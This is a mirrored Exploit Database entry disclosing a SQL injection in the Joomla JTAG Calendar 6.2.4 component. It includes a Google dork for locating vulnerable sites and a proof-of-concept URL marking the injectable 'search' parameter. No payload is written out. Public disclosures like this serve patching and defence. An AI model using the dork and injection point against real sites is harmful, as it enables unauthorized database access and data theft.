Joomla! Component JTAG Calendar 6.2.4 – ‘search’ SQL Injection

• Exploit Database
• 96 阅读

• 作者： Persian Hack Team
  日期： 2017-01-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41209/

• # Exploit Title: Joomla Component JTAG Calendar 6.2.4 - SQL Injection
  # Date: 2017-1-28
  # Vender Home : https://extensions.joomla.org/extension/jtag-calendar/
  # Exploit Author: Persian Hack Team
  # Discovered by : Mojtaba MobhaM
  # Home : http://persian-team.ir/
  # Tested on: Windows AND Linux
  # Telegram Channel : @PersianHackTeam
  # Google Dork : inurl:index.php?option=com_jtagcalendar 
  
  # POC :
  # Search Parameter Vulnerable to Sql Injection
  # http://Server.com/?option=com_jtagcalendar&format=raw&noframe=1&search=[SQL]&searchOnly=1
  
  # Present to FireFighters
  # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
  

  Python

  Copy